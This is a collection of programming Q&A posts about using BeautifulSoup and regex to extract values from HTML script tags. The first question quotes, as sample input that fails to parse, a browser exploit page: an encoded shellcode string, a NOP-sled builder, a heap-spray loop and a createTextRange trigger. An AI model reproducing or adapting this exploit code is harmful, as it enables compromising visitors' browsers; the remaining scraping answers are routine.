I'm trying to scrape a large number of HTML files with unknown encodings. I chose BeautifulSoup over raw lxml because it's fast and has an easy API, but I find that it does not always manage to parse files, due to its attempts to decode them as Unicode.
Now, I don't necessarily need it to decode the text in the HTML, but rather to identify the structure of the DOM and the tags it contains; if they hold more data I prefer to decode it myself.
I've tried excluding some encodings to overcome this problem, but this also doesn't always work.
Can this feature be disabled in some way?
Here's the base for my parser:
from bs4 import BeautifulSoup, Comment, Tag


class HTMLParser():
    def __init__(self, data, exclude_encodings=None):
        self.html_tree = BeautifulSoup(data, 'lxml', exclude_encodings=exclude_encodings)
        self._tag_handlers = dict()

    def start(self):
        for node in self.html_tree.recursiveChildGenerator():
            if isinstance(node, Tag):
                if node.name in self._tag_handlers and self._tag_handlers[node.name] is not None:
                    self._tag_handlers[node.name](node)
            elif isinstance(node, Comment):
                self._handle_comment(node)
Tag handlers are registered according to what needs to be parsed and how.
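For illustration, here is a minimal usage sketch; the handle_script function and the direct assignment into _tag_handlers are assumptions for the example, not part of the original class:
def handle_script(node):
    # only the tag structure matters here; its text can be decoded separately later
    print(node.name, len(node.text))

parser = HTMLParser(open('page.html', 'rb').read())
parser._tag_handlers['script'] = handle_script  # assumed registration style
parser.start()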
Also, here is a sample of the HTML that's causing the problem:
<html> <head> <script language="javascript"> var shellcode_str = "}yÒüiõ—·BxC‘¾¿f±© Ñâ=*ù²|4{öã'uH# ™´˜°q$áv?gN›’Ö¨%5I ,Ÿ(Ô“¸O-µA¶sFº‡øq!ë|+ü»~x'J¹B—¸=¶¾’“F9Õ·÷Ö/r?7CzNI:â$#ù–™wpg„ýf˜±A4º´²›%‘¨µy{ õt³,¿©O°v5GãþÀá2ÐÔ- K1à}<ŸuHyutB¿´ ø#kÔ²™‘˜¾»’CA#õ|fë?ý"ü-I ÖÓá/¶x7N,†ùwvzg}€â~ ¹%=±ºJ›sp'Ÿr5°¨H–4“ Kµ<ˆÕ— à$³©G{FqO¸·‰ã?Af·wq)ÿÇÆÁø–;á3ü{Nz ù…ë-~H¨›±º ³vu=C°0â}àtK™#¸$<¹©¶GJ¾|xg%Ÿ“B´’‘µsy ²p41Ö˜#Ô/ý;ãO—ÕI,»'F¿õr75†àköÀâzHu}KŒë Ÿp"á*÷ãv/´rO·~qf³’A ˜¹±B7=+Õ¿—C4N‡ø°»‘st,{F¾©IyÐÔƒý™g¸x5$%–|'“G-#?Jwõ0üº²¶›¨µ< ÓÖ„ùs w<¿°˜¸t âgCf7?¹»,(Ñãz} Òà¾3Ô¶´—Jº–%{Õ³·Ÿëý:õ±™µ“©u~pyvI’¨ø/GrFKqáH|)Ö!Áù‘…üxNzOq'u=²›{As8á$~5}4yàB|9ã#-™âCvÖtw4¾K» ü·F¿‘iý€õˆø7¶Jp›ºr x%µ“¹2ëGf‰ùB±5?© ˜/-¨’#O–=ŸÔ°—¸,²g³$<I´Õ'ANHÙÈÙt$ô¸ØÉZ•[+ɱH1CƒëüCâ-5²ÍÆC|D#r®2''~1eÄõž_{¿‘è6™œéö%r)˜Ù‰~zàAs{%¿|)þË/Þ‹ŽóUÇt‰Uªyužò<¸œ9ö3VÉ ’§28Úk ô×rI3¡Gµr5a”gâL&ȃŸ#0LûLŸs,ÅÛWè¸ö©kn©ÔÏ¡÷ØëŸéè`f{gR)×ïÞ¢ñè!™EfÜ"µ®våØŠ÷n2" Iœ€9\NhPS±ˆ[¹Ú"¡*ﲩ¸‡°© =O§£kÇP]6“Á¢íÙÂ)ŒÙl y*;o,5–Ñ£†[èáÃáßyÍw 2— ædý ŽÐ¥r«pç`‹z^Ô\j½Ÿfj‚IOèòÿ£0"; var nop_str = "ùHA"; var shellcode_total_length = 20 + shellcode_str.length; while(nop_str.length < shellcode_total_length) { nop_str += nop_str; } var nop_final = nop_str.substring(0,shellcode_total_length); var remaining_nops = nop_str.substring(0,nop_str.length-shellcode_total_length); while(remaining_nops.length + shellcode_total_length < 0x40000) { remaining_nops += nop_final; } var arr = new Array(); var counter = 0; var max_size = 2020; function func() { spain_id.innerHTML = Math.round((counter / max_size) * 100); if(counter < max_size) { arr.push(remaining_nops + shellcode_str); counter++; } else { spain_id.innerHTML = 100; element = document.createElement("input"); element.type = "image"; _FDPS = element.createTextRange(); } } function interval_func() { setInterval('func()', 5) } </script>
What happens is that the BeautifulSoup object ends up with no children at all, even though the document clearly has a script node, so my start method does nothing.
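One sketch of the "decode it myself" idea, offered only as an assumption: passing an already-decoded str makes BeautifulSoup skip its own encoding detection, and latin-1 maps every byte, so the ASCII markup survives even when the payload text is garbage:
raw = open('sample.html', 'rb').read()
# latin-1 never raises on decode; the tag structure stays intact and the text
# inside the tags can be re-decoded later with whatever codec fits
tree = HTMLParser(raw.decode('latin-1'))
tree.start()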
Related
I have the following javascript in the header of pages on my site:
<script type='text/javascript'>
var gaProperty = 'UA-00000000-1';
var disableStr = 'ga-disable-' + gaProperty;
if ( document.cookie.indexOf( disableStr + '=true' ) > -1 ) {
window[disableStr] = true;
}
function gaOptout() {
document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
window[disableStr] = true;
}
</script>
I'm trying to extract the var gaProperty from each page (i.e. UA-00000000-1) for a list of URLs in a CSV file using Python. I'm new to Python and put together a script from bits of scripts I've seen around, but it doesn't work:
from requests_html import HTMLSession
from urllib.request import urlopen
from bs4 import BeautifulSoup
import csv
import re
list = []
with open('list.csv','r') as csvf:  # Open file in read mode
    urls = csv.reader(csvf)
    for url in urls:
        list.append(url)  # Add each url to list contents

for url in list:
    page = urlopen(url[0]).read()
    path = " ".join(url)
    soup = BeautifulSoup(page, "lxml")
    data = soup.find_all('script', type='text/javascript')
    gaid = re.search(r'UA-[0-9]+-[0-9]+', data[0].text)
    print(path, gaid)
The incorrect result I get is:
https:www.example.com/contact-us/ None
I need to achieve this desired output for each URL:
https:www.example.com/contact-us/ UA-00000000-1
Any idea how to get this working in Python?
I would include var gaProperty in the pattern to be more specific, then use a lazy capture group to grab everything between the quotes that follow, i.e. to wrap the gaid value.
import re
html ='''
<script type='text/javascript'>
var gaProperty = 'UA-00000000-1';
var disableStr = 'ga-disable-' + gaProperty;
if ( document.cookie.indexOf( disableStr + '=true' ) > -1 ) {
window[disableStr] = true;
}
function gaOptout() {
document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
window[disableStr] = true;
}
</script>'''
gaid = re.search(r"var gaProperty = '(.*?)'", html).group(1)
print(f'https:www.example.com/contact-us/ {gaid}')
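To wire this back into the original CSV loop, a rough sketch (keeping the question's list.csv and assuming one URL per row) could look like this:
import csv
import re
from urllib.request import urlopen

from bs4 import BeautifulSoup

pattern = re.compile(r"var gaProperty = '(.*?)'")

with open('list.csv', 'r') as csvf:
    urls = [row[0] for row in csv.reader(csvf) if row]

for url in urls:
    page = urlopen(url).read()
    soup = BeautifulSoup(page, 'lxml')
    # search every text/javascript block, not just the first one
    for script in soup.find_all('script', type='text/javascript'):
        match = pattern.search(script.text)
        if match:
            print(url, match.group(1))
            break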
I'm building a web scraper but got stuck on one problem: how do I get that data value?
<script>
var store = {
data: 'ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9',
domain: 'www.domain.com'
};
</script>
I'm using python with requests and bs4.
x = Beautifulsoup.find('script')
data = x.text
I got output
var store = {
data: 'ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9',
domain: 'www.domain.com'
};
Now, how do I get that data value?
It is a normal string, so use string functions like strip(), split(), replace(), or slicing.
For example:
text = '''var store = {
data: 'ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9',
domain: 'www.domain.com'
};'''
lines = text.split('\n')
parts = lines[1].strip().split(': ')
name = parts[0]
data = parts[1].strip(',')[1:-1]
print(name, '=', data)
parts = lines[2].strip().split(': ')
name = parts[0]
data = parts[1].strip(',')[1:-1]
print(name, '=', data)
Result
data = ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9
domain = www.domain.com
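Not part of the original answer, but as an alternative sketch, a single regex over the same text avoids relying on line positions:
import re

text = '''var store = {
data: 'ffggel4784hth4ve8bf5hhe8rh4b1d4g84usd9',
domain: 'www.domain.com'
};'''

# capture every key: 'value' pair inside the object literal
for name, value in re.findall(r"(\w+): '([^']*)'", text):
    print(name, '=', value)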
I need a way to get information from a web page. That info is stored in a <script> tag and I can't find a way to extract it. Here is the last iteration of the code I used.
for link in urls:
    driver.get(link)
    # print(driver.title)
    content = driver.page_source
    soup = BeautifulSoup(content, features="html.parser")
    for a in soup.findAll(string=['script', "EM.", "productFullPrice"]):
        print(a)
        name = a.find(string=['EM.sef_name'])
        print(name)
print(a) and print(name) return nothing.
The source code I want to scrape looks like this:
<script type="text/javascript">
var EM = EM || {};
EM.CDN = 'link1';
EM.something = value;
If you want the text inside the tag, you can't just pass 'EM' as the string argument, because BeautifulSoup then looks for a string that exactly matches 'EM'. That also means it won't match the script tag either; passing 'script' as a string only looks for the literal text "script" inside a tag. To get the node itself you need to pass 'script' as the tag name to findAll. If you look at the text value between the script tags, it looks like this: "\n var EM = EM || {};\n EM.CDN = 'link1';\n EM.something = value; \n ". So it won't find 'EM', because 'EM' isn't equal to that whole string. There are a couple of ways to go about this; here is one I chose that returns values similar to what you posted:
import bs4
html_string = '''
<script type="text/javascript">
var EM = EM || {};
EM.CDN = 'link1';
EM.something = value;
</script>
'''
wanted_strings = ["EM.", "productFullPrice"]
soup = bs4.BeautifulSoup(html_string, features="html.parser")
wanted = []
test = soup.findAll('script')
for word in wanted_strings:
    for tag in test:
        if word in tag.text:
            wanted.append(tag)
wanted
which will then give you a list of the script tags that contain the strings you need:
[<script type="text/javascript">
var EM = EM || {};
EM.CDN = 'link1';
EM.something = value;
</script>]
Another way to do this is to just look for the tag and then place each line of code in a list:
import bs4
html_string = '''
<script type="text/javascript">
var EM = EM || {};
EM.CDN = 'link1';
EM.something = value;
</script>
'''
soup = bs4.BeautifulSoup(html_string, features="html.parser")
test = soup.findAll('script')
blah = [x.strip() for x in test[0].text.split('\n') if x.strip()]
blah
which gives you something like this, which may be easier to search depending on your use case:
['var EM = EM || {};', "EM.CDN = 'link1';", 'EM.something = value;']
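If the goal is one specific value, say EM.CDN from the sample markup, a hedged follow-up sketch reusing the soup object from the snippet above would be:
import re

# reuses `soup` from the snippet above; EM.CDN comes from the sample markup
script_text = soup.find('script').text
match = re.search(r"EM\.CDN\s*=\s*'([^']*)'", script_text)
if match:
    print(match.group(1))  # link1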
I know this has been asked before, but I am a newbie at scraping and Python. Please help me; it would be very helpful on my learning path.
I am scraping a news site using Python with packages such as Beautiful Soup.
I am having difficulty getting the value of a JavaScript variable which is declared in a script tag and is also updated there.
Here is the part of the HTML page I am scraping (containing only the script part):
<!-- Eliminate render-blocking JavaScript and CSS in above-the-fold content -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.0/js/materialize.min.js"></script>
<script type="text/javascript" src="/dist/scripts/index.js"></script>
<script type="text/javascript" src="/dist/scripts/read.js"></script>
<script src="/dist/scripts/jquery.scrolldepth.min.js"></script>
<script type="text/javascript">
var min_news_id = "d7zlgjdu-1"; // line 1
function loadMoreNews(){
$("#load-more-btn").hide();
$("#load-more-gif").show();
$.post("/en/ajax/more_news",{'category':'politics','news_offset':min_news_id},function(data){
data = JSON.parse(data);
min_news_id = data.min_news_id||min_news_id; // line 2
$(".card-stack").append(data.html);
})
.fail(function(){alert("Error : unable to load more news");})
.always(function(){$("#load-more-btn").show();$("#load-more-gif").hide();});
}
jQuery.scrollDepth();
</script>
From the above part, I want to get the value of min_news_id in Python.
I should also get the value of the same variable if it is updated at line 2.
Here is how I am doing it:
self.pattern = re.compile('var min_news_id = (.+?);')  # or self.pattern = re.compile('min_news_id = (.+?);')
page = bs(htmlPage, "html.parser")
# find all the script tags
scripts = page.find_all("script")
for script in scripts:
    for line in script:
        scriptString = str(line)
        if "min_news_id" in scriptString:
            scriptString.replace('"', '\\"')
            print(scriptString)
            if self.pattern.match(str(scriptString)):
                print("matched")
                data = self.pattern.match(scriptString)
                jsVariable = json.loads(data.groups()[0])
                InShortsScraper.newsOffset = jsVariable
                print(InShortsScraper.newsOffset)
But I am never getting the value of the variable. Is it a problem with my regular expression, or something else? Please help me.
Thank You in advance.
import re

html = '''<!-- Eliminate render-blocking JavaScript and CSS in above-the-fold content -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.0/js/materialize.min.js"></script>
<script type="text/javascript" src="/dist/scripts/index.js"></script>
<script type="text/javascript" src="/dist/scripts/read.js"></script>
<script src="/dist/scripts/jquery.scrolldepth.min.js"></script>
<script type="text/javascript">
var min_news_id = "d7zlgjdu-1"; // line 1
function loadMoreNews(){
$("#load-more-btn").hide();
$("#load-more-gif").show();
$.post("/en/ajax/more_news",{'category':'politics','news_offset':min_news_id},function(data){
data = JSON.parse(data);
min_news_id = data.min_news_id||min_news_id; // line 2
$(".card-stack").append(data.html);
})
.fail(function(){alert("Error : unable to load more news");})
.always(function(){$("#load-more-btn").show();$("#load-more-gif").hide();});
}
jQuery.scrollDepth();
</script>'''
finder = re.findall(r'min_news_id = .*;', html)
print(finder)
Output:
['min_news_id = "d7zlgjdu-1";', 'min_news_id = data.min_news_id||min_news_id;']
#2 OR YOU CAN USE
print(finder[0].replace('min_news_id = ', '').replace('"','').replace(';','').strip())
Output:
d7zlgjdu-1
#3 OR YOU CAN USE
finder = re.findall(r'[a-z0-9]{8}-[0-9]', html)
print(finder)
Output:
['d7zlgjdu-1']
You can't monitor a JavaScript variable changing with BeautifulSoup; here is how to get the next page of news using a while loop, re, and the JSON response:
from bs4 import BeautifulSoup
import requests, re
page_url = 'https://inshorts.com/en/read/politics'
ajax_url = 'https://inshorts.com/en/ajax/more_news'
htmlPage = requests.get(page_url).text
# BeautifulSoup extract article summary
# page = BeautifulSoup(htmlPage, "html.parser")
# ...
# get current min_news_id
min_news_id = re.search(r'min_news_id\s+=\s+"([^"]+)', htmlPage).group(1)  # result: d7zlgjdu-1
customHead = {'X-Requested-With': 'XMLHttpRequest', 'Referer': page_url}
while min_news_id:
    # change "politics" if in a different category
    reqBody = {'category': 'politics', 'news_offset': min_news_id}
    # get Ajax next page
    ajax_response = requests.post(ajax_url, headers=customHead, data=reqBody).json()  # parse string to json
    # again, do extract article summary
    page = BeautifulSoup(ajax_response["html"], "html.parser")
    # ....
    # ....
    # new min_news_id
    min_news_id = ajax_response["min_news_id"]
    # remove this to loop over all pages (thousands?)
    break
Thank you for the response. I finally solved it using the requests package after reading its documentation; here is my code:
if InShortsScraper.firstLoad == True:
    self.pattern = re.compile('var min_news_id = (.+?);')
else:
    self.pattern = re.compile('min_news_id = (.+?);')
page = None
# print("Pattern: " + str(self.pattern))
if news_offset == None:
    htmlPage = urlopen(url)
    page = bs(htmlPage, "html.parser")
else:
    self.loadMore['news_offset'] = InShortsScraper.newsOffset
    # print("payload : " + str(self.loadMore))
    try:
        r = myRequest.post(
            url=url,
            data=self.loadMore
        )
    except TypeError:
        print("Error in loading")
    InShortsScraper.newsOffset = r.json()["min_news_id"]
    page = bs(r.json()["html"], "html.parser")
    # print(page)
if InShortsScraper.newsOffset == None:
    scripts = page.find_all("script")
    for script in scripts:
        for line in script:
            scriptString = str(line)
            if "min_news_id" in scriptString:
                finder = re.findall(self.pattern, scriptString)
                InShortsScraper.newsOffset = finder[0].replace('min_news_id = ', '').replace('"', '').replace(';', '').strip()
I am trying to pull static_token, but I am definitely not on the right track. I pulled all the JavaScript, and I figured my next step was to read it with JSON or turn it into JSON format, as that's what I was told on my previous question. I tried to use regex to pull it as well, with no luck on that end either; as pointed out in the comments, I don't know what I'm doing. Can you point me in the right direction to pull the static_token, with a brief description of what I need to actually do in these situations?
CODE
import requests
import json, re
from bs4 import BeautifulSoup
url =''' '''
response = requests.get(url)
soup1 = BeautifulSoup(response.text,'lxml')
html1 = soup1.find_all('script')[1] #.text
print(html1)
soup2 = BeautifulSoup(b'html1', 'lxml')
var = soup2.get('var static_token')
print(var)
My attempt using regex:
static_token = re.findall(('static_token":"([^"]+)'), soup.text)
print(static_token)
The source I'm trying to pull the info from:
<script type="text/javascript">var CUSTOMIZE_TEXTFIELD = 1;
var FancyboxI18nClose = 'Close';
var FancyboxI18nNext = 'Next';
var FancyboxI18nPrev = 'Previous';
var contentOnly = false;
var roundMode = 2;
var static_token = '850424cb3feab732e072a3d84e378908';
var taxEnabled = 1;
var titleDelivery = '<h3 class="page-subheading">Your delivery address</h3>';
var titleInvoice = '<h3 class="page-subheading">Your billing address</h3>';
var token = '0c7a8347a263972696d6514dcfa24741';
var txtConditionsIsNotNeeded = 'You do not need to accept the Terms of Service for this order.';
var txtDeliveryAddress = 'Delivery address';
var txtErrors = 'Error(s)';
var txtFree = 'Free';
var txtThereis = 'There is';
var txtWithTax = '(tax incl.)';
var txtWithoutTax = '(tax excl.)';
var usingSecureMode = true;
var vat_management = 0;</script>
You are confusing a lot of data types in this question. This is not the only way to approach this (or the most robust) but it is simple and can point you in the right direction.
You seem to be able to read the html and extract the script tags from it using BeautifulSoup into html1.
You need to look at the documentation to understand the data types being used. I would also recommend adding statements like this in your code to help.
html1 = soup.find_all('script')
print('html1', type(html1), html1) # the type is bs4.element.ResultSet
This var contains all of the script tags from your document. You can iterate over the tags, and find the text fields for each tag. But it is NOT a JSON formatted type.
Once you have a string and you want part of that string - regex should be one of your first thoughts. You don't want to use regex on the original html - that's the whole point of the BS4 library and others like it. HTML is often mangled, messy, and not well-suited for simple regular expressions. Use BeautifulSoup to parse the html and find the section you want, THEN use regex to parse the string.
for tag in html1:
    print('tag', type(tag), tag)  # bs4.element.Tag
    print()
    print('tag.text', type(tag.text), tag.text)  # str
    print()
    toks = re.findall(r"var static_token =\s*'(\w+)'", tag.text)
    print('toks', type(toks), toks)  # list
    print()
    if not toks:  # skip script tags that don't define static_token
        continue
    static_token = toks[0]
    print('static_token', type(static_token), static_token)  # str
    print()
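For comparison, a more compact variant of the same idea (a sketch, assuming soup was built from the page exactly as in the question) would be:
import re

# join the text of every script tag and search once
all_script_text = ' '.join(tag.text for tag in soup.find_all('script'))
match = re.search(r"var static_token\s*=\s*'(\w+)'", all_script_text)
static_token = match.group(1) if match else None
print(static_token)  # 850424cb3feab732e072a3d84e378908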